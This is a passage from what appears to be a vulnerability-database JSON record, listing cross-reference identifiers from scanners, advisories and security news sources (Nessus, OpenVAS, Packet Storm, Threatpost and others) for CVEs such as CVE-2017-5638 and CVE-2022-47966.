"MSSECURE:D41D8CD98F00B204E9800998ECF8427E", "MSSECURE:D6D537E875C3CBD84822A868D24B31BA", "MSSECURE:E3C8B97294453D962741782EC959E79C"]}, {"type": "myhack58", "idList": ["MYHACK58:62201681759", "MYHACK58:62201784024", "MYHACK58:62201784026", "MYHACK58:62201784086", "MYHACK58:62201784379", "MYHACK58:62201785187", "MYHACK58:62201785189", "MYHACK58:62201785243", "MYHACK58:62201785268", "MYHACK58:62201785272", "MYHACK58:62201785331", "MYHACK58:62201786371", "MYHACK58:62201786816", "MYHACK58:62201786819", "MYHACK58:62201786827", "MYHACK58:62201788439", "MYHACK58:62201788542", "MYHACK58:62201789251", "MYHACK58:62201789305", "MYHACK58:62201789425", "MYHACK58:62201889929", "MYHACK58:62201890758", "MYHACK58:62201891024", "MYHACK58:62201891130", "MYHACK58:62201891264", "MYHACK58:62201891962", "MYHACK58:62201892253", "MYHACK58:62201892510", "MYHACK58:62201993410", "MYHACK58:62201994299", "MYHACK58:62201994516", "MYHACK58:62201995674"]}, {"type": "nessus", "idList": ["700055.PRM", "CITRIX_NETSCALER_CTX267027.NASL", "CITRIX_SSL_VPN_CVE-2019-19781.NBIN", "DEBIAN_DLA-1325.NASL", "DEBIAN_DSA-4156.NASL", "DRUPAL_8_5_1.NASL", "DRUPAL_CVE-2018-7600_RCE.NBIN", "FEDORA_2018-906BA26B4D.NASL", "FEDORA_2018-922CC2FBAA.NASL", "FLASH_PLAYER_APSA18-01.NASL", "FORTIGATE_FG-IR-22-398.NASL", "FREEBSD_PKG_2BAB995F36D411EA9DAD002590ACAE31.NASL", "FREEBSD_PKG_756A86310B8411E8A9866451062F0F7A.NASL", "FREEBSD_PKG_A9E466E8414411E8A29200E04C1EA73D.NASL", "GENTOO_GLSA-201803-08.NASL", "MACOSX_FLASH_PLAYER_APSA18-01.NASL", "MACOSX_MS15-033_OFFICE_2011.NASL", "MANAGEENGINE_ACCESS_MANAGER_PLUS_CVE-2022-47966.NBIN", "MANAGEENGINE_SERVICEDESK_CVE-2022-47966.NBIN", "MANAGEENGINE_SERVICEDESK_MSP_13001_RCE.NASL", "MANAGEENGINE_SERVICEDESK_MSP_CVE-2022-47966.NBIN", "MANAGEENGINE_SERVICEDESK_PLUS_14004.NASL", "MS17-010.NASL", "MYSQL_ENTERPRISE_MONITOR_3_3_3_1199.NASL", "ORACLE_WEBCENTER_SITES_APR_2017_CPU.NASL", "ORACLE_WEBLOGIC_SERVER_CPU_APR_2017.NASL", "ORACLE_WEBLOGIC_SERVER_CPU_JUL_2017.NASL", "ORACLE_WEBLOGIC_SERVER_CVE-2017-9805.NBIN", "PULSE_CONNECT_SECURE-CVE-2019-11510.NASL", "PULSE_CONNECT_SECURE-SA-44101.NASL", "PULSE_CONNECT_SECURE_PATH_TRAVERSAL.NBIN", "REDHAT-RHSA-2018-0285.NASL", "SELLIGENT_MESSAGE_STUDIO_RCE.NBIN", "SMB_NT_MS12-027.NASL", "SMB_NT_MS15-033.NASL", "SMB_NT_MS17-010.NASL", "SMB_NT_MS17-APR_4015551.NASL", "SMB_NT_MS17_APR_4014793.NASL", "SMB_NT_MS17_APR_4015549.NASL", "SMB_NT_MS17_APR_OFFICE.NASL", "SMB_NT_MS17_NOV_OFFICE.NASL", "SMB_NT_MS17_SEP_4038781.NASL", "SMB_NT_MS17_SEP_4038782.NASL", "SMB_NT_MS17_SEP_4038783.NASL", "SMB_NT_MS17_SEP_4038788.NASL", "SMB_NT_MS17_SEP_4038792.NASL", "SMB_NT_MS17_SEP_4038799.NASL", "SMB_NT_MS17_SEP_4041083.NASL", "SMB_NT_MS17_SEP_WIN2008.NASL", "SMB_NT_MS18_FEB_4074595.NASL", "SMB_NT_MS19_FEB_OFFICE_SHAREPOINT.NASL", "SMB_NT_MS19_MAR_OFFICE_SHAREPOINT.NASL", "STRUTS_2_5_10_1_RCE.NASL", "STRUTS_2_5_10_1_WIN_LOCAL.NASL"]}, {"type": "nmap", "idList": ["NMAP:HTTP-VULN-CVE2017-5638.NSE", "NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310106640", "OPENVAS:1361412562310106646", "OPENVAS:1361412562310106647", "OPENVAS:1361412562310106652", "OPENVAS:1361412562310106653", "OPENVAS:1361412562310106736", "OPENVAS:1361412562310108438", "OPENVAS:1361412562310108771", "OPENVAS:1361412562310140180", "OPENVAS:1361412562310140190", "OPENVAS:1361412562310140229", "OPENVAS:1361412562310141028", "OPENVAS:1361412562310141029", "OPENVAS:1361412562310141398", "OPENVAS:1361412562310704156", "OPENVAS:1361412562310805062", "OPENVAS:1361412562310805063", "OPENVAS:1361412562310805064", "OPENVAS:1361412562310805165", "OPENVAS:1361412562310805166", "OPENVAS:1361412562310810676", "OPENVAS:1361412562310810686", "OPENVAS:1361412562310810687", "OPENVAS:1361412562310810688", "OPENVAS:1361412562310810689", "OPENVAS:1361412562310810690", "OPENVAS:1361412562310810692", "OPENVAS:1361412562310810748", "OPENVAS:1361412562310810810", "OPENVAS:1361412562310810850", "OPENVAS:1361412562310810851", "OPENVAS:1361412562310811244", "OPENVAS:1361412562310811321", "OPENVAS:1361412562310811322", "OPENVAS:1361412562310811323", "OPENVAS:1361412562310811324", "OPENVAS:1361412562310811325", "OPENVAS:1361412562310811326", "OPENVAS:1361412562310811671", "OPENVAS:1361412562310811757", "OPENVAS:1361412562310811759", "OPENVAS:1361412562310811816", "OPENVAS:1361412562310811820", "OPENVAS:1361412562310811827", "OPENVAS:1361412562310811828", "OPENVAS:1361412562310811829", "OPENVAS:1361412562310812083", "OPENVAS:1361412562310812148", "OPENVAS:1361412562310812202", "OPENVAS:1361412562310812209", "OPENVAS:1361412562310812583", "OPENVAS:1361412562310812584", "OPENVAS:1361412562310812683", "OPENVAS:1361412562310812684", "OPENVAS:1361412562310812685", "OPENVAS:1361412562310812686", "OPENVAS:1361412562310812687", "OPENVAS:1361412562310812688", "OPENVAS:1361412562310812689", "OPENVAS:1361412562310814523", "OPENVAS:1361412562310874382", "OPENVAS:1361412562310874383", "OPENVAS:1361412562310874421", "OPENVAS:1361412562310874422", "OPENVAS:1361412562310874428", "OPENVAS:1361412562310874456", "OPENVAS:1361412562310875500", "OPENVAS:1361412562310875534", "OPENVAS:1361412562310876320", "OPENVAS:1361412562310891325", "OPENVAS:1361412562310902829", "OPENVAS:902829"]}, {"type": "oracle", "idList": ["ORACLE:CPUAPR2017", "ORACLE:CPUJUL2017"]}, {"type": "osv", "idList": ["OSV:DLA-1325-1", "OSV:GHSA-J77Q-2QQG-6989"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:112176", "PACKETSTORM:141576", "PACKETSTORM:141630", "PACKETSTORM:142181", "PACKETSTORM:142211", "PACKETSTORM:142281", "PACKETSTORM:142548", "PACKETSTORM:143164", "PACKETSTORM:144148", "PACKETSTORM:145226", "PACKETSTORM:146236", "PACKETSTORM:147041", "PACKETSTORM:147181", "PACKETSTORM:147182", "PACKETSTORM:147247", "PACKETSTORM:147392", "PACKETSTORM:154176", "PACKETSTORM:154690", "PACKETSTORM:155904", "PACKETSTORM:155905", "PACKETSTORM:155930", "PACKETSTORM:155947", "PACKETSTORM:155972", "PACKETSTORM:156196", "PACKETSTORM:170882", "PACKETSTORM:170925", "PACKETSTORM:170943"]}, {"type": "pentestit", "idList": ["PENTESTIT:C47AA6D1808026ACA45B1AD1CF25CA3B", "PENTESTIT:F5DFB26B34C75683830E664CBD58178F"]}, {"type": "prion", "idList": ["PRION:CVE-2022-42475", "PRION:CVE-2022-47966"]}, {"type": "ptsecurity", "idList": ["PT-2020-01"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:0082A77BD8EFFF48B406D107FEFD0DD3", "QUALYSBLOG:01C65083E501A6BAFB08FCDA1D561012", "QUALYSBLOG:110CC96D8440CC2A1EA0521D300634ED", "QUALYSBLOG:1A5EE9D9F7F017B2137FF614703A8605", "QUALYSBLOG:1D4C1F32168D08F694C602531AEBC9D9", "QUALYSBLOG:22DFA98A7ED25A67B3D38EAAE5C82A9E", "QUALYSBLOG:282A52EA9B1F4C4F3F084197709217B0", "QUALYSBLOG:3B1C0CD4DA2F528B07C93411EA447658", "QUALYSBLOG:5C311FA52DD78D7015076D492F321DB0", "QUALYSBLOG:6AFD8E9AB405FBE460877D857273A9AF", "QUALYSBLOG:82E24C28622F0C96140EDD88C6BD8F54", "QUALYSBLOG:832B33D45F45271E91CA6542BC9CFD59", "QUALYSBLOG:8DC9B53E981BBE193F6EC369D7FA85F8", "QUALYSBLOG:97274435F9F49556ED060635FD9081E2", "QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4", "QUALYSBLOG:9D071EBE42634FFBB58CB68A83252B41", "QUALYSBLOG:AB2325C5FBED5CF55517445600D470C1", "QUALYSBLOG:AF3D80BA12D4BBA1EE3BE23A5E730B6C", "QUALYSBLOG:B52BDC456D269490B2D446E678D17295", "QUALYSBLOG:BC22CE22A3E70823D5F0E944CBD5CE4A", "QUALYSBLOG:CAF5B766E6B0E6C1A5ADF56D442E7BB2", "QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8", "QUALYSBLOG:D38E3F9D341C222CBFEA0B99AD50C439", "QUALYSBLOG:D57DEDE8164E21BF8EE0C81B50AAA328", "QUALYSBLOG:D8942BC5A4E89874A6FC2A8F7F74D3F1", "QUALYSBLOG:DE1FEC2B9B661D42DAA0BA398DBFD24E", "QUALYSBLOG:DEB92D82F8384860B06735A45F20B980", "QUALYSBLOG:FFC962F3C57B514805A24EA07FF565A1"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:24E0BE5176F6D3963E1824AD4A55019E", "RAPID7BLOG:3801C6C4728415BDC9A56A2258BD827B", "RAPID7BLOG:3E54ECACB70B1C9E4DF1458D3CABE899", "RAPID7BLOG:6A1F743B64899419F505BFE243BD179F", "RAPID7BLOG:C90DF07E98E436DFBFCC5BA576D21019", "RAPID7BLOG:CA6D1E560679DBBB9F7A5EECC34A0194", "RAPID7BLOG:D1061BEC8F38C05C82730335576C86AF", "RAPID7BLOG:F4F1A7CFCF2440B1B23C1904402DDAF2"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:078B46BBA3057CDE37845D48479CC3DD", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:BDA3EA90B57FC8895B98DAADBAE3D7DE", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:DADF9A5B22CCB70155177EBC2E86131E"]}, {"type": "redhat", "idList": ["RHSA-2018:0285"]}, {"type": "redhatcve", "idList": ["RH:CVE-2017-5638", "RH:CVE-2018-4877", "RH:CVE-2018-4878", "RH:CVE-2022-47966"]}, {"type": "saint", "idList": ["SAINT:01D1CBFEFCD799FC1DCF4DD30F44F248", "SAINT:17FB524069BA3CD18537B30C76190BF7", "SAINT:1AF7483E5B4DB373D9449DD910472EA5", "SAINT:25A1AE710DDC7BDF13922068FD6E1AB1", "SAINT:27C5127555C4E549C099885D4DCD41D9", "SAINT:2837E3FFCA88074AEA3D7A814D67BEC2", "SAINT:3A3289A18B5C46A88581C9E8D4D0CF5A", "SAINT:420D07B85504086850EFAA31B8BCAEB5", "SAINT:484D58D595B8F6CEE787306160971308", "SAINT:5DC0FF1D23C8E8C36A1A8D72F1EB2B74", "SAINT:67BEB8C11AAB63038EBD6BD535D548D7", "SAINT:691FBFDFE24704CB1E9FB73F0186260A", "SAINT:966010900F7632E797C552D31C2BB53A", "SAINT:9D4369A8D6921FF2F218653A934F5F00", "SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:C857C9B9FEF5E0F807DAAB797C3B2D87", "SAINT:D79A7CB8B12034409DA174D1F0EC34F3", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:DB6048DE08200736030664D3F0E6C764", "SAINT:E218D6FA073276BB012BADF2CCE50F0E", "SAINT:FA42FF32EDF77D4600EA8685EBDE9D45"]}, {"type": "securelist", "idList": ["SECURELIST:03923D895F0F0B7EB3A51F48002D1416", "SECURELIST:094B9FCE59977DD96C94BBF6A95D339E", "SECURELIST:0C40BC07DFF80D4B158D166D0DC2C870", "SECURELIST:0EC04669D1B4F9900C7ED36BB8AFB1A2", "SECURELIST:0ED76DA480D73D593C82769757DFD87A", "SECURELIST:11665FFD7075FB9D59316195101DE894", "SECURELIST:163368D119719D834280EA969EDB785D", "SECURELIST:1670EF82924C5F24DC777CBD3BA4AE5E", "SECURELIST:20C7BC6E3C43CD3D939A2E3EAE01D4C1", "SECURELIST:2625ABE43A309D7E388C4F0EBCA62244", "SECURELIST:29152837444B2A7E5A9B9FCB107DAB36", "SECURELIST:2E379BD626ECA8E38B18EDCA6CD22F3C", "SECURELIST:322E7EEAE549CDB14513C2EDB141B8BA", "SECURELIST:35644FF079836082B5B728F8E95F0EDD", "SECURELIST:375240F06A95008FE7F1C49E97EEC5AF", "SECURELIST:376CB760FDD4E056A8D0695A9EB9756A", "SECURELIST:3DB11A5605F77743FA5F931DF816A83C", "SECURELIST:45427EE61DFCFA843ED5C3F7CAB026A1", "SECURELIST:45BAFC60F3E2EFDD0D35C99D042559B4", "SECURELIST:48D15DFCBE9043594D59B08C3C4F3A21", "SECURELIST:49E48EDB41EB48E2FCD169A511E8AACD", "SECURELIST:4A1162E18E20A1A1E0F057FE02B3AE75", "SECURELIST:4FE9AF32AEB194433587B75288D50FDA", "SECURELIST:5147443B0EBD7DFCCB942AD0E2F92CCF", "SECURELIST:53EC9FA168E0493828018AA0C1B799C0", "SECURELIST:56D279C45B0C4431FBA76FDF2EC365A1", "SECURELIST:5F58A2B6A05CED1E343735029CE88CC2", "SECURELIST:652E2EF2009E38562770BCAC629BEA2E", "SECURELIST:6C418779587ADE032AB673F44440002B", "SECURELIST:70BCDF20EABD280713CFF28CEE3C6374", "SECURELIST:73735B62C781261398E44FFF82262BCD", "SECURELIST:75F0B75D28318C525992E42495D8C5EE", "SECURELIST:78FB952921DD97BAF55DA33811CB6FE4", "SECURELIST:7F5AA1EA9018F295D1D8A9882EA0F724", "SECURELIST:833C831E498502BB46DD03F0C6F4D597", "SECURELIST:934E8AA177A27150B87EC15F920BF350", "SECURELIST:967D8B65D5D554FFB5B46411F654A78A", "SECURELIST:9B6F07B15AEDE81CE353FC4D91FF6329", "SECURELIST:9CEE13B3A189B3DBB187C6946786F480", "SECURELIST:9E653409B4D8C46D45939FA37442E456", "SECURELIST:A2A995C1C898D3DA4DB008FBA6AA149E", "SECURELIST:A3CEAF1114E104F14254F7AF77D7D080", "SECURELIST:A4072107882E39592149B0DB12585D70", "SECURELIST:A71E207678429F2F49013A82A5A5EED4", "SECURELIST:A9EBC6A1BD7D7A743024BD012EAC8323", "SECURELIST:ADE333FF4D3F96FCD027E6BB825FFD9B", "SECURELIST:B7116025A4E34CF6B9FED5843F7CDCD4", "SECURELIST:BB0230F9CE86B3F1994060AA0A809C08", "SECURELIST:C1F2E1B6711C8D84F3E78D203B3CE837", "SECURELIST:C540EBB7FD8B7FB9E54E119E88DB5C48", "SECURELIST:CE954DA57A5EE857B62F0E00D36A5003", "SECURELIST:CE9654E321FEC18D47DA16E0CF9D0CCE", "SECURELIST:D0FFA6E46D43B7A592C34676F2EF3EDB", "SECURELIST:D257E8B7FC070ED8409973F0F9A689E6", "SECURELIST:D3F258CC3CAC108A409150AE598738D9", "SECURELIST:D5FF48D3F16D23612E466F29C9C5B63B", "SECURELIST:D7795824A5A02E1E45E51294D78CEBC2", "SECURELIST:DA58D4888BE428D1D0C529B16E07E85D", "SECURELIST:DF3251CC204DECD6F24CA93B7A5701E1", "SECURELIST:F05B277B9FBC7AA810A2092CB58DEF37", "SECURELIST:F1FC61836DCAA7F1E27411092B208523", "SECURELIST:F4445BFDE49DF55279E5B69E613E7CA2", "SECURELIST:F62AEEAB0355FAC92D225F808BBF00CD", "SECURELIST:F6E885706A3B59254C617CE5C255F27B", "SECURELIST:FD260953F9A253DA440959CABD79EDE3", "SECURELIST:FD71ACDBBCF57BD4C7DE182D2309BF9D"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:12320", "SECURITYVULNS:VULN:14385"]}, {"type": "seebug", "idList": ["SSV:90202", "SSV:92746", "SSV:92804", "SSV:92935", "SSV:92952", "SSV:96484", "SSV:97136", "SSV:97207"]}, {"type": "symantec", "idList": ["SMNTC-100742", "SMNTC-101757", "SMNTC-102893", "SMNTC-106914", "SMNTC-111238", "SMNTC-73995", "SMNTC-96703"]}, {"type": "talosblog", "idList": ["TALOSBLOG:224F6FF67DED69B2FFFA483B3490BCE0", "TALOSBLOG:36D857BF71D07CAE276BCB26AC34D574", "TALOSBLOG:3E4DED1D580BBFDD5A456042C03F6483", "TALOSBLOG:3ED0A7241D26DA2E055F95E6C0B4328B", "TALOSBLOG:3F14583676BF3FEC18226D8E465C8707", "TALOSBLOG:422E9F3F2D27B5C62D821C614EBE60A6", "TALOSBLOG:5AED45D6F563E6F048D9FCACECC650CC", "TALOSBLOG:7192A351B37E9A67C1A5DB760A14DA7E", "TALOSBLOG:7F660B8BF6BF1461DC91FBA38C034D9A", "TALOSBLOG:809E263C085A7EC5D9424905C6E4ACA8", "TALOSBLOG:906482C918479D3D0C5D654DF6CC9FED", "TALOSBLOG:991CC85C1D7CC3CD70110C7FAE123FAC", "TALOSBLOG:9F3650D77DE88BE04EFECD8F54CE0BE1", "TALOSBLOG:A09C50A444F2D7D6A5D4552C85316387", "TALOSBLOG:A69C35FFFCE6FA744216C7784C7D2148", "TALOSBLOG:A841859916AA26CF6EF3F3F403502778", "TALOSBLOG:AB5E63755953149993334997F5123794", "TALOSBLOG:B69F0136CDE2A78382370469FF70F7DB", "TALOSBLOG:C73CDA82B845335B5DCC8A94FB5662D8", "TALOSBLOG:C840FAF5403868E1730CD6FB8F3F09E6", "TALOSBLOG:CC380ECFE738DDDFB3125AC0B32484C7", "TALOSBLOG:CDA48DA087B7839DDC1F8E0F4281D325", "TALOSBLOG:CF2344D3946410B628ACF0DE5E525347", "TALOSBLOG:D7662F18F14544FB63C58CB527CC3A4A", "TALOSBLOG:DAD87115458AF1FB5EDF5A2BB21D8AB9", "TALOSBLOG:DB8F26399F12B0F9B9309365CB42D9BB", "TALOSBLOG:E17B2B34420CA9C9A1CD5E1FE7980D8C", "TALOSBLOG:E19A22F37E2F320BDD9B4727A5209175", "TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6", "TALOSBLOG:E8F926D413AF8A060A5CA7289C0EAD20", "TALOSBLOG:EE177479683FB1333547D9FA076F4D46", "TALOSBLOG:F661E733634AB3D9655B38A94F050A82", "TALOSBLOG:FAB75C531A83C576A2D8274490FF6114"]}, {"type": "thn", "idList": ["THN:0E6CD47141AAF54903BD6C1F9BD96F44", "THN:125A440CBDB25270B696C1CCC246BEA1", "THN:14032BD2586B50B37F3D79977D4C8F4F", "THN:166AAAF7F04EF01C9E049500387BD1FD", "THN:1AC8C94468BC3582621B1E56C40127CD", "THN:1AFD9B38CF83CBCCF34CEA589CD5838B", "THN:1B78DDF8BAADEE9CFC252FF9708EE0A6", "THN:1ED1BB1B7B192353E154FB0B02F314F4", "THN:24864C773B218FDD62A2BDB4E7E95B89", "THN:25E1C5E39F109FC80A69CCF02734A606", "THN:260FF74ECE80E5E87FD329A68B1420EE", "THN:2707247140A4F620671B33D68FEB1EA9", "THN:2722097C084561C0EE24E84FA6AD506E", "THN:28D18D871A6086136DFA7958D9C516E0", "THN:2C8CBCD861548E196121A3935B9E6F83", "THN:3266EB2F73FA4A955845C8FEBA4E73C5", "THN:39B398DC5FBBEB4CA2C998AFB00B141E", "THN:3A9F075C981951FC8C86768D0EF1794A", "THN:3BC4F7FE3170D82B2C8328638552D1D3", "THN:3E5F28AD1BE3C9B2442EA318E6E13E5C", "THN:3E9680853FA3A677106A8ED8B7AACBE6", "THN:3F47D7B66C8A65AB31FAC5823C96C34D", "THN:42A0EFDB5165477E18333E9EE1A81D8E", "THN:42E3306FC75881CF8EBD30FA8291FF29", "THN:44A32C71995BCA06A2F946B41E81310C", "THN:461B7AEC7D12A32B4ED085F0EA213502", "THN:46994B7A671ED65AD9975F25F514C6E3", "THN:4D48A331D9707E239D1C89EE592EE4D3", "THN:4DE731C9D113C3993C96A773C079023F", "THN:5133F80C8A11FE7678A971A326DDA682", "THN:52153F8855D24E20FDD2CC03040B1EF1", "THN:59AA6ADFEEB67D7E156CDF3579330697", "THN:5AD427A8B33BDFD2EE553727C6CE4EE0", "THN:5CEFBA9FAF414B3F57548EAB0EEA1718", "THN:6A1A5F396F8A43A1DA67A07FF545680A", "THN:6C0E5E35ABB362C8EA341381B3DD76D6", "THN:6C2DBDCB2BCAD28AA5B80EFC1EF9CDBF", "THN:6ED39786EE29904C7E93F7A0E35A39CB", "THN:7489F5CF1C31FDAC5F67F700D5DDCD5B", "THN:75586AE52D0AAF674F942498C96A2F6A", "THN:760436CE4EC7360DF1BD53E6B63CBE97", "THN:7FD924637D99697D78D53283817508DA", "THN:8007E43933D6EA07FB6E74E9DCC5FA70", "THN:81AA37DC2B87520CB02F3508EF82AABD", "THN:82833AE00002BB0F41BEF5FD8972FAFB", "THN:87AE96960D76D6C84D9CF86C2DDB837C", "THN:89C2482FECD181DD37C6DAEEB7A66FA9", "THN:8A48502265B6BF239E81FC688A0FF082", "THN:8D76D821D51DF9AAAAF1C9D1FA8CA0C5", "THN:8E5D44939B2B2FF0156F7FF2D4802857", "THN:8EAD85C313EF85BE8D38BAAD851B106E", "THN:91A2A296EF8B6FD5CD8B904690E810E8", "THN:91D830EBDC372E772FBEC3C61F17F028", "THN:96CCD36932DBF3F5BEFCC18D4EC4E5C2", "THN:96E4C6D641E3E5B73D4B9A87628DD3CF", "THN:9994A9D5CFB76851BB74C8AD52F3DBBE", "THN:9B536B531E6948881A29BEC793495D1E", "THN:9DC026B1716712BE0EF2205D941A4D67", "THN:A2139F34F5915952064FC587D775913E", "THN:ACD3479531482E2CA5A8E15EB6B47523", "THN:AE2E46F59043F97BE70DB77C163186E6", "THN:AE8CC4929BA80C03ABF4AA5FAB5465CC", "THN:AF93AEDBDE6169AD1163D53979A4EA04", "THN:B02C7C78600ED331232ABD4D1F8D2C4A", "THN:B0F0C0035DAAFA1EC62F15464A80677E", "THN:B95DC27A89565323F0F8E6350D24D801", "THN:BAC30CCFD2AEEC91A6E02417A6B55F56", "THN:BC214880895281474C1A8EF7B7D98C13", "THN:C21D17F1D92C12B031AB9C761BBD004A", "THN:C473C49BA4C68CD048FB1E0B4A2D04F4", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:CB1C2DA47986D8345154BCABBFE41314", "THN:CBEFDC179819629DFFC0C17341BFD3E8", "THN:D0592A04885C26716DF385AE8ABF8401", "THN:D18D5B68E1C8C3E3C323D4C71C3B2375", "THN:D9114576EA7861D9D8859B9EF23814E4", "THN:DABC62CDC9B66962217D9A8ABA9DF060", "THN:DADA9CB340C28F942D085928B22B103F", "THN:DC21EBE0272DEA3B043A3EB0A5B5B1DA", "THN:E35C79A0DEB43A22940D0D123D5D1112", "THN:E43F2DE4F472015C54D6014AB3A0F7A1", "THN:E50F78394BCAE6FF3B8EE8482A81A3C4", "THN:E69702EC6CD19254901FA21A1125CC18", "THN:E9454DED855ABE5718E4612A2A750A98", "THN:EB3F9784BB2A52721953F128D1B3EAEC", "THN:ED087560040A02BCB1F68DE406A7F577", "THN:F03064A70C65D9BD62A8F5898BA276D2", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:F6379983339D06A5EA6BE2B059C2955B", "THN:F8EDB5227B5DA0E4B49064C2972A193D", "THN:F91523FE89728E4535456872C0532560", "THN:FBCEC8F0CE0D3932FE4C315878C48403"]}, {"type": "threatpost", "idList": ["THREATPOST:00E7F3B203C0A059EA3AE42EEFDA4BF6", "THREATPOST:01085CB521431ED10FF25B00357004A0", "THREATPOST:011D33BB13274F4BC8AF713F8EBEC140", "THREATPOST:0234DE925A24BDFF85D569B0592C4E40", "THREATPOST:0273E2F0D7B4CECA41893B066B3C2D24", "THREATPOST:027F94626186E3644FA6008B6B65879D", "THREATPOST:02A26476FD54111CFB779DB36CA0BE95", "THREATPOST:0308A7143D92E14583CCD684912ABD67", "THREATPOST:037D55F658239A9DBF47BABD04D1F6E7", "THREATPOST:03F3C45744F6C52E1687C208288C7001", "THREATPOST:04738138B50414CEACDB62EFA6D61789", "THREATPOST:04FAA050D643AD8D61D8063D5232A682", "THREATPOST:051AFF295EB4024C33B9C6988E0F5C34", "THREATPOST:05856E5CAEC60A0E16D4618496270D44", "THREATPOST:05A74488EF15AE2BEA20C34AC753FB10", "THREATPOST:05CA5F0BEDE4AEE08ED1C40F6D413601", "THREATPOST:06F9A4BBE673BFFA63BB435F99387C6D", "THREATPOST:07E70978E087406E6779D5EE8D2D372D", "THREATPOST:088C4C91495F7C7262D861A66DC74B85", "THREATPOST:0A40F95A480060B254A1AA6FCF9504B2", "THREATPOST:0A9A930C281A9194FBCA1A6C9F168F74", "THREATPOST:0ACA8133652DA5D5C5D027A4F9EED75A", "THREATPOST:0B64A7C04FF47971B650E17B53C45FD2", "THREATPOST:0B96DF7B8D0B80F9F8340D753646049C", "THREATPOST:0BA7B2FCC73EB6AA27E7D15318D8DCEF", "THREATPOST:0C5877DE6DD50B0CB309505FAE7076AC", "THREATPOST:0D250E6E576E1C05274E04DB1BB79529", "THREATPOST:0DD2574E8237EB5925DD5C2AC8B9A426", "THREATPOST:0DD2AEA1738F9B6612B1C845F3BC949F", "THREATPOST:0E875F36B37069C0CA4DC570FE3BD197", "THREATPOST:0ECD1B8BDCF9CD65F10B363FC3FDABA9", "THREATPOST:0F2DE86E0069A54E56B0694DA999399A", "THREATPOST:0FAFED5DB78FA64CCE60EB40BB4C8915", "THREATPOST:0FEEF48E09B4F6AB583220AF2A1CCE70", "THREATPOST:105BBC66E564BD98581E52653F5EA865", "THREATPOST:1071D90B9DDF02B6FC796EE160E0AFDD", "THREATPOST:11053DD231ACA5F34708B38E7E96AE9F", "THREATPOST:1109584452DBA30B86EF68E3277D4E39", "THREATPOST:11A212CE63E0ED8390DF014E511EC174", "THREATPOST:1256E9A9997A1C51E9DB7AEB7A420D3D", "THREATPOST:12E93CDF8BAC1B158CE1737E859FDD80", "THREATPOST:1327F2449E675DB6F1F90EDB766B1DC8", "THREATPOST:14171FFFDCB402F0E392DA20B23E7B5A", "THREATPOST:14B2B02CB661C8C7E1BC1204495F0D25", "THREATPOST:14FF20625850B129B7F957E8393339F1", "THREATPOST:157F244C629A1657480AFA561FF77BE4", "THREATPOST:163B67EFAB31CDAD34D25B9194438851", "THREATPOST:1663F2C868E9B0A3184989EAF71EB3DA", "THREATPOST:17ABCE7BEBAC56FCA5601686C9601728", "THREATPOST:17AC167B3F04D3043199819655CB5EB8", "THREATPOST:1842F12350B277A2FE1B6F4AF2F1BFDB", "THREATPOST:18D24326B561A78A05ACB7E8EE54F396", "THREATPOST:191B75DFBFEAFA9F2F649D66191A07C9", "THREATPOST:195656DFCDBB1B18C4B0E899AA2C96DE", "THREATPOST:19F6727A0DB5ECAEB57AFC56191A2EC4", "THREATPOST:1A7A6E9FF0F2A41A6A83EBDE0038383C", "THREATPOST:1B29120EF1DBE107B55050178910AACD", "THREATPOST:1B56CE326878B69FFA20FFC20DB62365", "THREATPOST:1B75EB23D874C5D85DA6FEAB65007B4E", "THREATPOST:1BC8168472B040DAEF3D3D5CCC865068", "THREATPOST:1BCC479A05BA19E3B4906CB5F5FD2F1B", "THREATPOST:1C2F8B65F8584E9BF67617A331A7B993", "THREATPOST:1C5C89106D8897D6CDDFF572948A779A", "THREATPOST:1D743B7D5397A9D33A091396D1D95BDB", "THREATPOST:1E11FA7540C2CE7C48832A342FAAB3A8", "THREATPOST:1F7B99C76055BD44C266432644E6B9CB", "THREATPOST:1FA77776DEE21633617B7B927000ADBF", "THREATPOST:1FB73160B6AAB2B0406816BB6A61E4CB", "THREATPOST:1FB92D9630590CC17FF00234FF9991FF", "THREATPOST:1FDD4D6EFB350CC9F6F42A5514AA6849", "THREATPOST:2018FCCB3FFD46BACD36ADBC6C9013CE", "THREATPOST:20A9D9F111F89A61A6242B788FCF6209", "THREATPOST:20E3AA69A8819545B9E113C31E8452DD", "THREATPOST:212ACE7085CC094D6542F00AF0A4D1B4", "THREATPOST:21439BDD06D57894E0142A06D59463B5", "THREATPOST:215398BCE165265631436077B4E79ECB", "THREATPOST:2154D4513B1B000120D100B6FE1F0D83", "THREATPOST:222B126A673B8B22370D386B699A7F90", "THREATPOST:2243706D17F2A1E930A00F49D8E30720", "THREATPOST:23B92BF326746339F6B36D64AEB2D5F6", "THREATPOST:247A5639B207C2C522F735B0C3412087", "THREATPOST:2579CD250892361A8CC34804F8B6E540", "THREATPOST:26EDD0A7C1914DBF0CFE32B0877BE5A7", "THREATPOST:26EF81FADB8E1A92908C782EBBDB8C88", "THREATPOST:270516BE92D218A333101B23448C3ED3", "THREATPOST:27F2EB604A7262CA0448D6463BA3B2A4", "THREATPOST:27F8092D2D7E88CBD23EAF8A7A016E24", "THREATPOST:28D790372A5C9EB1083AA78A4FDF3C0E", 